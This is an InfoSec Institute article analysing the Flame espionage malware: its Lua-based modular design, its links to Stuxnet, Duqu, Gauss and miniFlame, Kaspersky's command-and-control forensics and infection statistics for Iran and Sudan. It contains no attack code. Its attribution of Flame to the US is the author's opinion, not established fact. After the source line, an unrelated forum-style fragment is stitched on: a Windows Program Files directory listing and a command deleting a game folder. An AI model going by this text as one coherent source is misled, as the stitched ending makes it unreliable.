The first investigations showed that Flame had been active since 2010, exactly the same period as Stuxnet, and in the opinion of analysts at Kaspersky Lab, both projects were produced by two separate, skilled teams of professionals who had the opportunity to collaborate during the design phase of the malware. Although the Kaspersky team maintains that Flame is an advanced cyber espionage tool, one strange detail raised doubts about Flame's capability to remain undetected for so long: its size is anomalous for a stealth espionage toolkit. The total size of the malware is almost 20 MB, considerable bulk explained by the presence of many different libraries and of a Lua virtual machine. This last feature is another distinctive element that represents an innovation and suggests that the developers behind the agents are professionals. The choice of the scripting language is mainly motivated by the following factors:

- Complete portability of the source code and simple integration with the C and C++ languages.
- It is a dynamic programming language.
- The Lua virtual machine is extremely compact, less than 200 KB.
- Lua is a cross-platform scripting language with “extensible semantics”, and its use is uncommon in malware development.

Flame is composed of several modules written in the scripting language, interfaced with subroutines and libraries compiled from C++.

Who is behind Flame?

Though it is difficult to say exactly who developed the malware, it is certainly a state-sponsored project, developed with the specific intent of attacking countries in the Middle East in exactly the same way as Stuxnet. To better understand Flame, let's analyze the story of the famous Stuxnet and find the correlations between the two malware families. 
The worldwide security community pointed to the US as the author of Stuxnet, which the US government consistently denied, shifting suspicion to the work of Israeli intelligence. According to an article published by The New York Times, adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power, both the US and Israeli governments developed and deployed Stuxnet. The planning of the deadly cyber weapon started under the administration of George W. Bush as part of a military operation named “Olympic Games”, but the Obama administration put more energy into the offensive program. The response of the US government to the article's revelations about the secret “Olympic Games” project was an internal investigation into the leaks of classified information about the development, rather than an official denial of the claims. The Kaspersky team demonstrated a strong correlation between Stuxnet and Flame, while also highlighting deep differences between the malicious codes. First of all, Stuxnet is considered the first cyber weapon, designed to destroy the Iranian nuclear program by infecting SCADA systems inside nuclear plants, while Flame is a sophisticated tool for cyber espionage. Stuxnet appears to have been designed on the famous Tilded platform, but Flame and the products of the Tilded framework, such as Duqu, are completely different, because they are based on different architectures. Flame never used system drivers, while Stuxnet and Duqu's main method of loading modules for execution is via a kernel driver. The presence of the US behind the development of Flame is not surprising. Cyber espionage is one of the main activities covered by every cyber strategy, an attempt to silently steal confidential information, technologies and intellectual property. 
The ability to infiltrate enemy networks and steal classified information represents a major advantage for those who lead the offensive. Stuxnet was created in the first half of 2009, when, according to Kaspersky researchers, the Flame platform already existed. One of the most sensational discoveries is that a Stuxnet instance dated 2009 used a module built on the Flame platform. This module was developed specifically to operate with the Stuxnet malware and was removed in subsequent versions. The Flame module found in Stuxnet exploited a 0-day vulnerability enabling an escalation of privileges, presumably exploiting MS09-025. Kaspersky expert Roel Schouwenberg noted that no Flame components have been used in more advanced versions of Stuxnet: “Flame was used as some sort of a kick-starter to get the Stuxnet project going,” he stated. “As soon as the Stuxnet team had their code ready, they went their way.” In the subsequent version of Stuxnet, a new module was found to have replaced it, empowering the propagation of the agent by exploiting the vulnerability MS10-046 instead of the “old” autorun.inf. Starting from 2009, the evolution of the two projects proceeded independently. This circumstance supports the hypothesis that behind Stuxnet and Flame there were two distinct development groups, named by Kaspersky “Team F” (Flame) and “Team D” (Tilded). Kaspersky CEO Eugene Kaspersky declared: “there were two different teams working in collaboration.” Summing up on the development teams: the authors of the malware started operations in 2007-2008 at the latest. The presence of the component from the Flame platform in Stuxnet demonstrates the collaboration between the groups, but since 2010 the platforms have been developed independently from each other. The only similarity observed between instances dated after 2010 is that both teams have been exploiting the same vulnerabilities. 
Figure – Relationship of Stuxnet, Duqu, Flame and Gauss, according to Kaspersky

It is not yet clear why two different groups of experts working for governments developed two distinct agents with common features. The following are some possible explanations:

- The creators of Stuxnet removed the Flame components to avoid being discovered in case of failure of the cyber attack against the Iranian nuclear program.
- The teams were working for different states that joined efforts to speed up the creation of a cyber weapon. Recall that many security experts had alerted the international community to the risk that Iran could build a nuclear arsenal within a couple of years, making the time factor decisive.

Flame today … and news of an alleged agent still in the wild

After months of investigation conducted by the Kaspersky team in collaboration with Symantec, ITU-IMPACT and CERT-Bund/BSI, Kaspersky researcher Dmitry Bestuzhev cracked the password protecting the Flame command and control server, obtaining access to the malware control panel. The C&C servers discovered were owned by a European company with data centers in another European Union country. The revelations were as sensational as predicted. The forensic analysis of the command & control servers revealed an additional three unidentified pieces of malware under the control of the attackers, but the most alarming discovery relates to an alleged agent still in the wild. According to the latest investigation, the first use of Flame, initially thought to have begun in 2010, appears to date to 2006. Digging deeper into the analysis, the group of security analysts obtained a server image which was an OpenVZ file-system container. OpenVZ is an operating-system-level virtualization technology based on the Linux kernel that allows a physical server to run multiple isolated operating system instances, but it made forensic analysis difficult. 
The study demonstrated that the malware's authors intentionally tried to cover the tracks of their operations by planting fake clues to disorient analysts. For example, the C&C servers present an elementary structure and look and feel, to give the impression they had been prepared by script kiddies, equipped with a simple and anomalous botnet control panel. A very interesting feature of the botnet is the way the C&C instructs the bots: they don't receive commands directly from the console; instead, the attackers uploaded specially crafted tar.gz archives containing scripts that were processed by the server. The server extracted the scripts from the archive, looking for *.news and *.ad files located in specific directories. The priority and target client ID were stored in the filename uploaded to a C&C server, with the following convention:

<random_number>_<user_type>_<user_id>_<priority>.<file extension>

Going deeper into the code analysis, the researchers discovered that the C&C servers were able to use different communication protocols, probably used to “converse” with different clients. The protocols discovered are dedicated to four different types of malware: SP, SPE, FL and IP, where FL stands for Flame; according to the code analyzed, the remaining clients are similar agents. The protocols are:

- OldProtocol
- OldProtocolE
- SignupProtocol
- RedProtocol (mentioned but not implemented)

Figure – Clients and protocol relations found in this C&C server – Kaspersky

By redirecting the botnet traffic to a “sinkhole” to observe traffic from infected machines and prevent further distribution of malware and scams, the researchers distinguished two different streams of data, related respectively to Flame and to another client, the SPE malware, demonstrating that it is operating in the wild. Traffic data directed to the C&C servers, collected over one week starting on March 25th, revealed 5377 unique IP addresses connected to the server located in Europe. 
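Purely as an illustration of that naming convention (the function and variable names below are hypothetical, chosen only to mirror the fields quoted above), such a filename can be split apart in plain shell:

```shell
# Illustrative only: split a filename of the form
# <random_number>_<user_type>_<user_id>_<priority>.<file extension>
# into its fields, following the convention described in the analysis.
parse_upload_name() {
    name="$1"
    ext="${name##*.}"        # text after the last dot
    base="${name%.*}"        # everything before the last dot
    IFS=_ read -r rand utype uid prio <<EOF
$base
EOF
    echo "random=$rand type=$utype id=$uid priority=$prio ext=$ext"
}

# Example: parse_upload_name 8342_client_17_3.news
```

Encoding routing metadata in the filename like this is what let the server dispatch uploads without any interactive command channel.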
Of those, 3700 connections originated from Iran and around 1280 from Sudan. Fewer than 100 connections were made from other countries, such as the United States, Germany and India. The targeted region, and the number of infections in specific countries, indicate a state-sponsored intelligence operation conducted against Iran and Sudan.

Figure – Client and protocol relations found in these C&C servers – Kaspersky

Among the most valuable traces left by the four developers in the scripts were their nicknames and internal timestamps, the earliest of which is dated December 3, 2006. Notably, one of the developers worked on a majority of the files, demonstrating great experience; he may have been the team leader, according to the report. The study states: “He coded some very smart patches and implemented complex logics; in addition, he seems to be a master of encryption algorithms. We think [the developer] was most likely a team lead.” Other interesting information uncovered from the analysis of the C&C servers includes the last modification date, May 18th, and the presence of an automated script used to delete log files and disable the logging function. The researchers found that a shred tool also used by the Duqu team was used to wipe information, as well as scripts that downloaded new data and removed old data every 30 minutes.

Ongoing investigation … new sensational revelations on miniFlame

On October 14th, Kaspersky Lab released a new report with the results of further investigation of the command and control servers and the traffic directed to them. As anticipated, the security researchers detected two different streams of data, related respectively to Flame and to another client, the SPE malware, demonstrating that it is operating in the wild. 
Kaspersky’s blog post refers to the SPE agent, the agent uncovered during the investigation, as “miniFlame”, highlighting that it is a smaller version of the Flame module, probably because it was developed earlier. Don’t let the name fool you: miniFlame is a fully functional espionage module designed for cyber espionage purposes and implemented as an independent module, able to operate on infected machines without the main Flame components, acting as a backdoor and allowing remote control by the attackers.

Another feature discovered in miniFlame is its ability to operate with the Gauss malware, demonstrating a common origin of the offensive against the Middle East region. This singular revelation is related to the use of the C&C servers: some of them were used exclusively to control SPE, others to control both SPE and Flame agents. The experts noted that the diffusion of miniFlame was limited with respect to Gauss and Flame, maybe because it was used as a surgical attack tool against very specific targets considered strategic by the attackers.

Figure – Malware diffusion data

SPE does not have a clear geographical bias. The researchers found different modifications used against different countries such as Lebanon, Iran, Kuwait, Palestine and Qatar. Looking at the sinkhole statistics for miniFlame, between May 28th and September 30th, 2012 the servers counted around 14,000 connections in total from about 90 different IPs. The two main locations of victims are Lebanon and Iran.

Figure – miniFlame geographic diffusion

The researchers discovered ten commands used to run the malware and to instruct the agent in cyber espionage operations. What about the other malware not yet identified? Researchers believe that SP could be an older version of miniFlame, while the IP agent is still under investigation to discover its purpose.
The paternity of the massive cyber espionage campaign is also still a mystery. The Kaspersky report on the topic states: “With Flame, Gauss and miniFlame, we have probably only scratched the surface of the massive cyber-spy operations ongoing in the Middle East. Their true, full purpose remains obscure and the identity of the victims and attackers remain unknown.”

Can Flame be considered a cyber weapon?

At first glance, Flame is not a cyber weapon. Despite being a state-sponsored project, it doesn’t fit the following definition: a cyber weapon is “any appliance, device or any set of computer instructions designed to unlawfully damage a computer or telecommunications system having the nature of critical infrastructure, causing huge damage, and to offend the person through cyberspace”. It is cyber espionage malware, but experts cannot ignore its modular structure, which makes it possible to use its components for offensive purposes simply by loading a module specifically developed to attack critical infrastructures. Kaspersky researcher Schouwenberg said he suspected Flame may be capable of deleting data and attacking industrial control systems. There is no evidence of this right now, but it is a feasible scenario.

A Symantec expert declared on the subject: “The modular nature of this malware suggests that a group of developers have created it with the goal of maintaining the project over a long period of time; very likely along with a different set of individuals using the malware. The architecture being employed by W32.Flamer allows the authors to change functionality and behavior within one component without having to rework or even know about the other modules being used by the malware controllers.
Changes can be introduced as upgrades to functionality, fixes, or simply to evade security products.”

Presenting the results of its investigation on miniFlame, the Kaspersky team used the words “cyber-weapon factory”, evidencing that these agents could also act for offensive purposes simply by loading a specific module. According to the results of the analysis, the authors of Flame created dozens of different agents, and many of them are probably yet to be discovered. The analysis by Kaspersky experts also revealed that the project started earlier than 2010, contrary to what was previously believed, and highlighted the great complexity of the encryption used: the information gathered by the malware is in fact encrypted on the server, and only the attackers can read it.

Concluding, Flame was just a part of a state-sponsored project; it’s quite possible that similar projects are still ongoing, and what is singular, in my opinion, is their ability to remain hidden for a long period, a characteristic that makes these agents very dangerous. Flame represents a milestone in the concept of cyber warfare. The security firms have been able to analyze the detected instances, but the modular structure leads them to believe that it is a work in progress with an unpredictable evolution.

References

The Flame: Questions and Answers - Securelist
Flamer: Highly Sophisticated and Discreet Threat Targets the Middle East | Symantec Connect Community
Flame fallout: Microsoft encryption deadline looms Tuesday - CSO Online - Security and Risk
New Investigation Points to Three New Flame-Related Malicious Programs: At Least One Still in the Wild | Business Wire
miniFlame aka SPE: "Elvis and his friends" - Securelist

Pierluigi Paganini is co-author of the newly-published e-book, The Deep Dark Web, available through Amazon and here.

Source: InfoSec Institute Resources - Flame: The Never Ending Story
  22. Wubi

    Coaili beta

C:\Program Files>dir
 Volume in drive C is COAILII
 Volume Serial Number is 28CF-ADE5

 Directory of C:\Program Files

10/18/2012  10:51 PM    <DIR>          .
10/18/2012  10:51 PM    <DIR>          ..
09/08/2012  05:29 AM    <DIR>          1ClickDownload
09/01/2012  12:43 AM    <DIR>          AMD APP
08/31/2012  11:16 PM    <DIR>          Analog Devices
09/02/2012  03:56 AM    <DIR>          ATI
09/02/2012  03:58 AM    <DIR>          ATI Technologies
08/31/2012  10:55 PM    <DIR>          AVAST Software
09/03/2012  01:51 AM    <DIR>          Awakening - The Dreamless Castle
10/18/2012  04:19 PM    <DIR>          Common Files
08/31/2012  10:16 PM    <DIR>          ComPlus Applications
09/02/2012  04:14 AM    <DIR>          Conduit
09/03/2012  03:12 PM    <DIR>          CounterStrikev47
09/08/2012  05:11 AM    <DIR>          DAEMON Tools Lite
10/07/2012  02:18 AM    <DIR>          Easy-Hide-IP
10/01/2012  06:01 PM    <DIR>          Hide My IP
08/31/2012  10:32 PM    <DIR>          Intel
08/31/2012  10:45 PM    <DIR>          Internet Explorer
08/31/2012  11:44 PM    <DIR>          Java
08/31/2012  11:46 PM    <DIR>          Messenger
10/18/2012  02:55 PM    <DIR>          Metin2
09/22/2012  03:10 PM    <DIR>          Microsoft ActiveSync
08/31/2012  10:20 PM    <DIR>          microsoft frontpage
09/22/2012  03:13 PM    <DIR>          Microsoft Office
10/08/2012  12:49 PM    <DIR>          Microsoft.NET
08/31/2012  11:28 PM    <DIR>          Movie Maker
10/18/2012  10:51 PM    <DIR>          Mozilla Firefox
10/18/2012  10:51 PM    <DIR>          Mozilla Maintenance Service
10/08/2012  11:47 AM    <DIR>          MSBuild
08/31/2012  10:15 PM    <DIR>          MSN
08/31/2012  10:16 PM    <DIR>          MSN Gaming Zone
08/31/2012  10:18 PM    <DIR>          NetMeeting
08/31/2012  11:35 PM    <DIR>          Online Services
09/01/2012  12:09 AM    <DIR>          Outlook Express
09/02/2012  04:19 AM    <DIR>          Pando Networks
10/08/2012  11:47 AM    <DIR>          Reference Assemblies
08/31/2012  11:49 PM    <DIR>          Skype
10/18/2012  09:49 PM    <DIR>          Steam
09/21/2012  11:19 AM    <DIR>          SweetIM
09/21/2012  11:52 PM    <DIR>          TeamSpeak 3 Client
08/31/2012  11:53 PM    <DIR>          TuneUp Utilities 2009
09/02/2012  04:13 AM    <DIR>          uTorrent
09/20/2012  01:03 PM    <DIR>          Valve
08/31/2012  11:39 PM    <DIR>          Webteh
08/31/2012  11:46 PM    <DIR>          Winamp
08/31/2012  11:44 PM    <DIR>          Windows Media Player
08/31/2012  10:15 PM    <DIR>          Windows NT
09/01/2012  12:40 AM    <DIR>          WinRAR
08/31/2012  10:20 PM    <DIR>          xerox
08/31/2012  11:36 PM    <DIR>          Yahoo!
09/08/2012  05:31 AM    <DIR>          Yontoo
               0 File(s)              0 bytes
              51 Dir(s)  11,732,324,352 bytes free

C:\Program Files>del Metin2
C:\Program Files\Metin2\*, Are you sure (Y/N)? Y

C:\Program Files>